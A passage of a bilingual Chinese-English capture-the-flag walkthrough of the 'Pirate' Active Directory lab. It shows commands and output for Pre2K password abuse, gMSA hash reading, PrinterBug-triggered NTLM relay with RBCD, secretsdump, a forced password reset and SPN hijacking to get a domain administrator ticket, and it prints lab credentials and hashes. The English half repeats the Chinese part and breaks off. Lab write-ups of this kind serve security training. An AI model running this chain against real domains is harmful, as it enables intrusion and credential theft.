这是一篇完整的“Pirate”域渗透靶机实战笔记。攻击路径非常清晰:首先,通过LDAP枚举发现“Pre-Windows 2000兼容访问”组的配置缺陷,利用Pre2K漏洞获取机器账户(MS01$)密码,进而读取gMSA服务凭据获得初始据点。接着,利用Ligolo-ng搭建内网隧道,结合打印机漏洞(PrinterBug)与NTLM中继执行RBCD(基于资源的约束委派)攻击,拿下WEB01并导出用户哈希 。最后,利用权限强制重置a.white_ADM的密码,并利用其WriteSPN权限实施SPN劫持,配合约束委派成功伪造域管票据,最终拿下域控(DC01)的最高权限 。 This is a complete practical walkthrough of the "Pirate" domain penetration testing machine. The attack path is very clear: First, through LDAP enumeration, a configuration flaw in the "Pre-Windows 2000 Compatible Access" group is discovered. The Pre2K vulnerability is exploited to obtain the machine account (MS01$) password, which then allows reading the gMSA service credentials to gain an initial foothold. Next, Ligolo-ng is used to establish an internal network tunnel. Combined with the PrinterBug vulnerability and NTLM relay, an RBCD (Resource-Based Constrained Delegation) attack is executed to compromise WEB01 and extract user hashes. Finally, forced password reset is performed for a.white_ADM, and its WriteSPN permission is leveraged to carry out SPN hijacking. Together with constrained delegation, this successfully forges a domain administrator ticket, ultimately compromising the domain controller (DC01) with highest privileges.
枚举
As is common in real life pentests, you will start the Pirate box with credentials for the following account pentest / p3nt3st2025!&
# Nmap 7.98 scan initiated Thu Mar 5 03:58:32 2026 as: /usr/lib/nmap/nmap -p 53,80,88,135,139,389,443,445,464,593,636,2179,3268,3269,5985,9389,49667,49685,49686,49688,49689,49913,61992,62014 -sC -sV -Pn -n -oN scan_results/nmap_details.txt 10.129.7.169
Nmap scan report for 10.129.7.169
Host is up (0.19s latency).
PORT STATE SERVICE VERSION
53/tcp open domain (generic dns response: NOTIMP)
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-05 10:58:39Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after: 2026-06-09T14:05:15
|_ssl-date: 2026-03-05T11:00:18+00:00; +7h00m01s from scanner time.
443/tcp open https?
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-05T11:00:18+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after: 2026-06-09T14:05:15
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-05T11:00:18+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after: 2026-06-09T14:05:15
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-05T11:00:17+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after: 2026-06-09T14:05:15
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49685/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49686/tcp open msrpc Microsoft Windows RPC
49688/tcp open msrpc Microsoft Windows RPC
49689/tcp open msrpc Microsoft Windows RPC
49913/tcp open msrpc Microsoft Windows RPC
61992/tcp open msrpc Microsoft Windows RPC
62014/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.98%I=7%D=3/5%Time=69A8FF73%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x85\x84\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-03-05T10:59:39
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 5 04:00:18 2026 -- 1 IP address (1 host up) scanned in 106.48 secondsSMB
➜ Pirate nxc smb 10.129.7.169 -u pentest -p 'p3nt3st2025!&' --shares
SMB 10.129.7.169 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:False)
SMB 10.129.7.169 445 DC01 [+] pirate.htb\pentest:p3nt3st2025!&
SMB 10.129.7.169 445 DC01 [*] Enumerated shares
SMB 10.129.7.169 445 DC01 Share Permissions Remark
SMB 10.129.7.169 445 DC01 ----- ----------- ------
SMB 10.129.7.169 445 DC01 ADMIN$ Remote Admin
SMB 10.129.7.169 445 DC01 C$ Default share
SMB 10.129.7.169 445 DC01 IPC$ READ Remote IPC
SMB 10.129.7.169 445 DC01 NETLOGON READ Logon server share
SMB 10.129.7.169 445 DC01 SYSVOL READ Logon server share查看SYSVOL和NETLOGON
nxc smb 10.129.7.169 -u pentest -p 'p3nt3st2025!&' -M spider_plus{
"NETLOGON": {},
"SYSVOL": {
"pirate.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI": {
"atime_epoch": "2025-06-08 16:25:14",
"ctime_epoch": "2025-06-08 14:39:53",
"mtime_epoch": "2025-06-08 16:25:14",
"size": "22 B"
},
"pirate.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
"atime_epoch": "2025-06-08 14:39:53",
"ctime_epoch": "2025-06-08 14:39:53",
"mtime_epoch": "2025-06-08 14:39:56",
"size": "1.07 KB"
},
"pirate.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol": {
"atime_epoch": "2025-06-08 16:25:14",
"ctime_epoch": "2025-06-08 16:25:14",
"mtime_epoch": "2025-06-08 16:25:14",
"size": "2.72 KB"
},
"pirate.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI": {
"atime_epoch": "2025-06-09 16:12:18",
"ctime_epoch": "2025-06-08 14:39:53",
"mtime_epoch": "2025-06-09 16:12:18",
"size": "22 B"
},
"pirate.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/Audit/audit.csv": {
"atime_epoch": "2025-06-09 16:12:18",
"ctime_epoch": "2025-06-09 16:09:27",
"mtime_epoch": "2025-06-09 16:12:18",
"size": "312 B"
},
"pirate.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
"atime_epoch": "2025-06-08 14:39:53",
"ctime_epoch": "2025-06-08 14:39:53",
"mtime_epoch": "2025-06-08 14:39:56",
"size": "3.68 KB"
}
}无任何价值
Kerberoasting
impacket-GetUserSPNs pirate.htb/pentest:'p3nt3st2025!&' -request -dc-ip 10.129.7.169$krb5tgs$23$*a.white_adm$PIRATE.HTB$pirate.htb/a.white_adm*$8c19d96...9826a23a8这个hash破解不出来
LDAP
➜ Pirate nxc ldap 10.129.7.169 -u 'pentest' -p 'p3nt3st2025!&' --users
LDAP 10.129.7.169 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb)
LDAP 10.129.7.169 389 DC01 [+] pirate.htb\pentest:p3nt3st2025!&
LDAP 10.129.7.169 389 DC01 [*] Enumerated 7 domain users: pirate.htb
LDAP 10.129.7.169 389 DC01 -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.129.7.169 389 DC01 Administrator 2025-06-08 14:32:36 0 Built-in account for administering the computer/domain
LDAP 10.129.7.169 389 DC01 Guest <never> 0 Built-in account for guest access to the computer/domain
LDAP 10.129.7.169 389 DC01 krbtgt 2025-06-08 14:40:29 0 Key Distribution Center Service Account
LDAP 10.129.7.169 389 DC01 a.white_adm 2026-01-16 00:36:34 0
LDAP 10.129.7.169 389 DC01 a.white 2025-06-08 19:33:01 0
LDAP 10.129.7.169 389 DC01 pentest 2025-06-09 13:40:23 0
LDAP 10.129.7.169 389 DC01 j.sparrow 2025-06-09 15:08:44 0nxc ldap 10.129.7.169 -u 'pentest' -p 'p3nt3st2025!&' --kerberoasting output.txt
LDAP 10.129.7.169 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb)
LDAP 10.129.7.169 389 DC01 [+] pirate.htb\pentest:p3nt3st2025!&
LDAP 10.129.7.169 389 DC01 [*] Skipping disabled account: krbtgt
LDAP 10.129.7.169 389 DC01 [*] Total of records returned 2
LDAP 10.129.7.169 389 DC01 [*] sAMAccountName: a.white_adm, memberOf: CN=IT,CN=Users,DC=pirate,DC=htb, pwdLastSet: 2026-01-16 00:36:34.388000, lastLogon: 2025-06-09 16:03:37.380258
LDAP 10.129.7.169 389 DC01 $krb5tgs$23$*a.white_adm$PIRATE.HTB$pirate.htb\a.white_adm*$3d0f7...d6aa2
LDAP 10.129.7.169 389 DC01 [*] sAMAccountName: gMSA_ADFS_prod$, memberOf: CN=Remote Management Users,CN=Builtin,DC=pirate,DC=htb, pwdLastSet: 2025-06-09 14:48:41.108220, lastLogon: 2026-03-05 10:51:58.242422
LDAP 10.129.7.169 389 DC01 $krb5tgs$18$gMSA_ADFS_prod$$PIRATE.HTB$*pirate.htb\gMSA_ADFS_prod$*$c7...fc3d好像没什么用,查看一下groups
nxc ldap 10.129.7.169 -u 'pentest' -p 'p3nt3st2025!&' --groupsLDAP 10.129.7.169 389 DC01 Pre-Windows 2000 Compatible Access membercount: 4发现有趣的组:Pre-Windows 2000 Compatible Access
▶相关介绍
在 Active Directory (活动目录,简称 AD) 中,Pre-Windows 2000 Compatible Access(兼容 Windows 2000 之前的访问权限组,其 Security Identifier (安全标识符,简称 SID) 为 S-1-5-32-554)主要存在的不是代码级别的代码执行漏洞,而是一个极其危险的安全配置错误 (Security Misconfiguration),它会导致严重的信息泄露 (Information Disclosure),并为内网渗透和权限提升铺平道路。
这个组最初是为了让 Windows NT 4.0 等旧版操作系统能够查询 AD 信息而设计的。它的核心安全风险主要体现在以下几个方面:
1. 默认的过度读取权限 (Overly Permissive Read Access)
该组在 Active Directory 的根级别拥有广泛的 Read(读取)权限。具体来说,该组的成员可以读取域内几乎所有用户对象和组对象的属性。
Everyone (所有人) 和 Authenticated Users (已验证的用户) 经常是这个组的成员。Authenticated Users),甚至在某些配置下无需认证的攻击者(如果 Everyone 包含匿名登录),就可以不受限制地通过 Lightweight Directory Access Protocol (轻量级目录访问协议,简称 LDAP) 查询整个域的架构。2. 匿名目录枚举 (Anonymous Directory Enumeration)
如果 Everyone 属于该组,并且域控制器允许空会话 (Null Session) 或匿名 LDAP 绑定:
rpcclient 或通过 LDAP 查询)枚举出域内的所有用户名、群组列表、甚至某些用户的详细描述 (Description) 字段。3. 辅助高级域渗透攻击 (Facilitating Advanced Domain Attacks)
Pre-Windows 2000 Compatible Access 组提供的无限制信息收集能力,是执行后续高级攻击的基石。攻击者可以轻易收集到以下信息来制定攻击路径:
4. 掩盖后门 (Persistence & Backdoors)
在红队行动 (Red Team Operations) 中,如果攻击者获取了高权限,他们可能会故意将普通用户或特定后门账号加入到 Pre-Windows 2000 Compatible Access 组中。因为这是一个系统内置的、名字看起来像“兼容性”的老旧组,蓝队或系统管理员在审计时往往会忽略它,从而允许攻击者维持对域内信息的隐蔽监控权限。
修复建议与防御措施:
作为防御方或在出具渗透测试报告时,应建议以下修复措施:
Everyone、Anonymous Logon (匿名登录) 和 Authenticated Users。利用
既然我们在AUTHENTICATED USERS@PIRATE.HTB(属于Pre-Windows 2000 Compatible Access)组里就相当于我们可以阅读所有的信息
ldapsearch -x -H ldap://10.129.7.169 -D 'pentest@pirate.htb' -w 'p3nt3st2025!&' -b "DC=pirate,DC=htb" "(objectClass=user)" > all_users_attributes.txt尝试读取泄露的密码
grep -i -E "pass|pwd|userparameters|info" all_users_attributes.txt
# 毫无收获尝试读取gmsa密码
nxc ldap 10.129.7.169 -u 'pentest' -p 'p3nt3st2025!&' --gmsa
# Account: gMSA_ADCS_prod$ NTLM: <no read permissions> PrincipalsAllowedToReadPassword: Domain Secure Servers只有组Domain Secure Servers才能读取,查询有哪些用户
ldapsearch -x -H ldap://10.129.7.169 -D 'pentest@pirate.htb' -w 'p3nt3st2025!&' -b "DC=pirate,DC=htb" "(&(objectCategory=group)(cn=Domain Secure Servers))" member
# 返回member: CN=MS01,CN=Computers,DC=pirate,DC=htb只有MS01才可以读取
Pre2K
通过谷歌搜索可以知道nxc的pre2k模块
▶相关介绍
在默认情况下,当一台计算机加入域时,域控会自动为其生成一个 120 字符长、完全随机的机器账户密码(通常每 30 天自动滚动一次),这使得爆破机器账户几乎不可能。
但是,Active Directory 用户和计算机 (ADUC) 管理工具里,一直保留着一个为了兼容老掉牙的 NT 系统而存在的复选框:“将此计算机帐户指定为 Windows 2000 之前的计算机 (Assign this computer account as a pre-Windows 2000 computer)”。
如果管理员在手动预创建计算机账户时(比如还没分配物理机,只是先在 AD 里建个坑位)勾选了这个框,极其离谱的事情就会发生: AD 不会生成随机密码,而是直接把这台计算机名字的小写,作为它的初始密码!
SERVERDEMO$,它的密码就是 serverdemo。MS01$,如果它存在这个漏洞,它的密码就是 ms01!利用
nxc ldap 10.129.7.169 -u 'pentest' -p 'p3nt3st2025!&' -M pre2k
# MS01$和EXCH01$读取gmsa
nxc ldap DC01.pirate.htb -u 'MS01$' -p 'ms01' -k --gmsaAccount: gMSA_ADCS_prod$ NTLM: 304106f739822ea2ad8ebe23f802d078
Account: gMSA_ADFS_prod$ NTLM: 8126756fb2e69697bfcb04816e685839 USER
evil-winrm连接
evil-winrm -u 'gMSA_ADCS_prod$' -H '304106f739822ea2ad8ebe23f802d078' -i DC01.pirate.htb检查网络
*Evil-WinRM* PS C:\Users> ipconfig
Windows IP Configuration
Ethernet adapter vEthernet (Switch01):
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::d976:c606:587e:f1e1%8
IPv4 Address. . . . . . . . . . . : 192.168.100.1
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv4 Address. . . . . . . . . . . : 10.129.7.169
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1ligolo-ng搭建桥梁
有关搭建查看ligolo-ng官网
寻找存活主机
nxc smb 192.168.100.0/24SMB 192.168.100.1 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:False)
SMB 192.168.100.2 445 WEB01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:WEB01) (domain:pirate.htb) (signing:False) (SMBv1:False)发现WEB01,且SMB签名禁用。证明可以尝试ntlm中继攻击
查询打印机
nxc smb 192.168.100.2 -u GMSA_ADFS_PROD$ -H 8126756fb2e69697bfcb04816e685839 -M spooler
# 返回Spooler service enabled准备中继
sudo impacket-ntlmrelayx -t smb://10.129.7.169 -smb2support --remove-mic -socks
# --remove-mic消息完整性代码 Message Integrity Codeligolo中配置转发
[Agent : PIRATE\gMSA_ADFS_prod$@DC01] » listener_add --addr 0.0.0.0:8888 --to 127.0.0.1:445执行攻击
python printerbug.py -hashes :8126756fb2e69697bfcb04816e685839 'pirate.htb/GMSA_ADFS_PROD$'@192.168.100.2 10.10.17.34进去以后执行了RBCD攻击,获得了WEB01机器的权限
利用凭据XUPXYXWJ$:Mvb0i(gL8v$>{PG获取administrator的TGT,随后导出nthash
impacket-secretsdump -k -no-pass -target-ip 192.168.100.2 WEB01.pirate.htb
# 得到a.white : E2nvAOKSz5Xz2MJuROOT
根据bloodhound:a.white对a.white_ADM有ForceChangePassword
bloodyAD --host 192.168.100.1 -d Pirate.htb -u a.white -p E2nvAOKSz5Xz2MJu set password 'a.white_ADM' 'P@ssword123!'
# [+] Password changed successfully!a.white_ADM属于IT组对DC01.PIRATE有WriteSPN权限,找出委派关系
impacket-findDelegation pirate.htb/a.white_adm:'P@ssword123!' -dc-ip 192.168.100.1AccountName AccountType DelegationType DelegationRightsTo SPN Exists
----------- ----------- ---------------------------------- --------------------- ----------
DC01$ Computer Unconstrained N/A Yes
a.white_adm Person Constrained w/ Protocol Transition http/WEB01.pirate.htb Yes
a.white_adm Person Constrained w/ Protocol Transition HTTP/WEB01 Yes
XUPXYXWJ$ Computer Resource-Based Constrained WEB01$ NoSPN 劫持
- 用户
a.white_adm被允许代表任何人(协议转换)去访问WEB01的 HTTP 服务。 a.white_adm对DC01拥有WriteSPN权限。
利用 SPN 的唯一性,把本该属于 WEB01 的委派权,转移到 DC01 身上,以实现a.white_adm以管理员访问DC01
移除WEB01的SPN
python3 ~/Work/Tools/krbrelayx/addspn.py -t 'WEB01$' -u 'pirate.htb\a.white_adm' -p 'P@ssword123!' 'DC01.pirate.htb' -r --spn 'http/WEB01.pirate.htb'
# 返回SPN Modified successfully转移
python3 ~/Work/Tools/krbrelayx/addspn.py -t 'DC01$' -u 'pirate.htb\a.white_adm' -p 'P@ssword123!' 'dc01.pirate.htb' -s 'http/WEB01.pirate.htb'
# 返回SPN Modified successfully获取票据
impacket-getST -spn 'http/WEB01.pirate.htb' -impersonate administrator 'pirate.htb/a.white_adm:P@ssword123!' -dc-ip 10.129.7.169 -altservice 'cifs/DC01.pirate.htb'
# 返回Saving ticket in administrator@http_WEB01.pirate.htb@PIRATE.HTB.ccache
# -altservice参数绕过了协议转换的限制因为TG是长期的,所以DC信任
impacket-smbclient -k -no-pass DC01.pirate.htb即可获取root
Enumeration
As is common in real life pentests, you will start the Pirate box with credentials for the following account pentest / p3nt3st2025!&
# Nmap 7.98 scan initiated Thu Mar 5 03:58:32 2026 as: /usr/lib/nmap/nmap -p 53,80,88,135,139,389,443,445,464,593,636,2179,3268,3269,5985,9389,49667,49685,49686,49688,49689,49913,61992,62014 -sC -sV -Pn -n -oN scan_results/nmap_details.txt 10.129.7.169
Nmap scan report for 10.129.7.169
Host is up (0.19s latency).
PORT STATE SERVICE VERSION
53/tcp open domain (generic dns response: NOTIMP)
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-05 10:58:39Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after: 2026-06-09T14:05:15
|_ssl-date: 2026-03-05T11:00:18+00:00; +7h00m01s from scanner time.
443/tcp open https?
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-05T11:00:18+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after: 2026-06-09T14:05:15
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-05T11:00:18+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after: 2026-06-09T14:05:15
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-05T11:00:17+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after: 2026-06-09T14:05:15
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49685/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49686/tcp open msrpc Microsoft Windows RPC
49688/tcp open msrpc Microsoft Windows RPC
49689/tcp open msrpc Microsoft Windows RPC
49913/tcp open msrpc Microsoft Windows RPC
61992/tcp open msrpc Microsoft Windows RPC
62014/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.98%I=7%D=3/5%Time=69A8FF73%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x85\x84\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-03-05T10:59:39
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 5 04:00:18 2026 -- 1 IP address (1 host up) scanned in 106.48 secondsSMB
➜ Pirate nxc smb 10.129.7.169 -u pentest -p 'p3nt3st2025!&' --shares
SMB 10.129.7.169 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:False)
SMB 10.129.7.169 445 DC01 [+] pirate.htb\pentest:p3nt3st2025!&
SMB 10.129.7.169 445 DC01 [*] Enumerated shares
SMB 10.129.7.169 445 DC01 Share Permissions Remark
SMB 10.129.7.169 445 DC01 ----- ----------- ------
SMB 10.129.7.169 445 DC01 ADMIN$ Remote Admin
SMB 10.129.7.169 445 DC01 C$ Default share
SMB 10.129.7.169 445 DC01 IPC$ READ Remote IPC
SMB 10.129.7.169 445 DC01 NETLOGON READ Logon server share
SMB 10.129.7.169 445 DC01 SYSVOL READ Logon server shareView SYSVOL and NETLOGON
nxc smb 10.129.7.169 -u pentest -p 'p3nt3st2025!&' -M spider_plus{
"NETLOGON": {},
"SYSVOL": {
"pirate.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI": {
"atime_epoch": "2025-06-08 16:25:14",
"ctime_epoch": "2025-06-08 14:39:53",
"mtime_epoch": "2025-06-08 16:25:14",
"size": "22 B"
},
"pirate.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
"atime_epoch": "2025-06-08 14:39:53",
"ctime_epoch": "2025-06-08 14:39:53",
"mtime_epoch": "2025-06-08 14:39:56",
"size": "1.07 KB"
},
"pirate.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol": {
"atime_epoch": "2025-06-08 16:25:14",
"ctime_epoch": "2025-06-08 16:25:14",
"mtime_epoch": "2025-06-08 16:25:14",
"size": "2.72 KB"
},
"pirate.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI": {
"atime_epoch": "2025-06-09 16:12:18",
"ctime_epoch": "2025-06-08 14:39:53",
"mtime_epoch": "2025-06-09 16:12:18",
"size": "22 B"
},
"pirate.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/Audit/audit.csv": {
"atime_epoch": "2025-06-09 16:12:18",
"ctime_epoch": "2025-06-09 16:09:27",
"mtime_epoch": "2025-06-09 16:12:18",
"size": "312 B"
},
"pirate.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
"atime_epoch": "2025-06-08 14:39:53",
"ctime_epoch": "2025-06-08 14:39:53",
"mtime_epoch": "2025-06-08 14:39:56",
"size": "3.68 KB"
}
}Nothing of value
Kerberoasting
impacket-GetUserSPNs pirate.htb/pentest:'p3nt3st2025!&' -request -dc-ip 10.129.7.169$krb5tgs$23$*a.white_adm$PIRATE.HTB$pirate.htb/a.white_adm*$8c19d96...9826a23a8This hash cannot be cracked
LDAP
➜ Pirate nxc ldap 10.129.7.169 -u 'pentest' -p 'p3nt3st2025!&' --users
LDAP 10.129.7.169 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb)
LDAP 10.129.7.169 389 DC01 [+] pirate.htb\pentest:p3nt3st2025!&
LDAP 10.129.7.169 389 DC01 [*] Enumerated 7 domain users: pirate.htb
LDAP 10.129.7.169 389 DC01 -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.129.7.169 389 DC01 Administrator 2025-06-08 14:32:36 0 Built-in account for administering the computer/domain
LDAP 10.129.7.169 389 DC01 Guest <never> 0 Built-in account for guest access to the computer/domain
LDAP 10.129.7.169 389 DC01 krbtgt 2025-06-08 14:40:29 0 Key Distribution Center Service Account
LDAP 10.129.7.169 389 DC01 a.white_adm 2026-01-16 00:36:34 0
LDAP 10.129.7.169 389 DC01 a.white 2025-06-08 19:33:01 0
LDAP 10.129.7.169 389 DC01 pentest 2025-06-09 13:40:23 0
LDAP 10.129.7.169 389 DC01 j.sparrow 2025-06-09 15:08:44 0nxc ldap 10.129.7.169 -u 'pentest' -p 'p3nt3st2025!&' --kerberoasting output.txt
LDAP 10.129.7.169 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb)
LDAP 10.129.7.169 389 DC01 [+] pirate.htb\pentest:p3nt3st2025!&
LDAP 10.129.7.169 389 DC01 [*] Skipping disabled account: krbtgt
LDAP 10.129.7.169 389 DC01 [*] Total of records returned 2
LDAP 10.129.7.169 389 DC01 [*] sAMAccountName: a.white_adm, memberOf: CN=IT,CN=Users,DC=pirate,DC=htb, pwdLastSet: 2026-01-16 00:36:34.388000, lastLogon: 2025-06-09 16:03:37.380258
LDAP 10.129.7.169 389 DC01 $krb5tgs$23$*a.white_adm$PIRATE.HTB$pirate.htb\a.white_adm*$3d0f7...d6aa2
LDAP 10.129.7.169 389 DC01 [*] sAMAccountName: gMSA_ADFS_prod$, memberOf: CN=Remote Management Users,CN=Builtin,DC=pirate,DC=htb, pwdLastSet: 2025-06-09 14:48:41.108220, lastLogon: 2026-03-05 10:51:58.242422
LDAP 10.129.7.169 389 DC01 $krb5tgs$18$gMSA_ADFS_prod$$PIRATE.HTB$*pirate.htb\gMSA_ADFS_prod$*$c7...fc3dSeems useless, check the groups
nxc ldap 10.129.7.169 -u 'pentest' -p 'p3nt3st2025!&' --groupsLDAP 10.129.7.169 389 DC01 Pre-Windows 2000 Compatible Access membercount: 4Found an interesting group: Pre-Windows 2000 Compatible Access
▶Overview
In Active Directory (AD), the Pre-Windows 2000 Compatible Access group (with Security Identifier (SID) S-1-5-32-554) is not a code execution vulnerability but an extremely dangerous Security Misconfiguration that leads to severe Information Disclosure and paves the way for internal network penetration and privilege escalation.
This group was originally designed to allow older operating systems like Windows NT 4.0 to query AD information. Its core security risks are mainly reflected in the following aspects:
1. Default Overly Permissive Read Access
The group has extensive Read permissions at the root level of Active Directory. Specifically, members of this group can read almost all user and group object attributes within the domain.
Everyone and Authenticated Users are often members of this group.Authenticated Users), or even unauthenticated attackers in some configurations (if Everyone includes anonymous logons), can freely query the entire domain schema via Lightweight Directory Access Protocol (LDAP).2. Anonymous Directory Enumeration
If Everyone belongs to this group and the domain controller allows Null Session or anonymous LDAP binding:
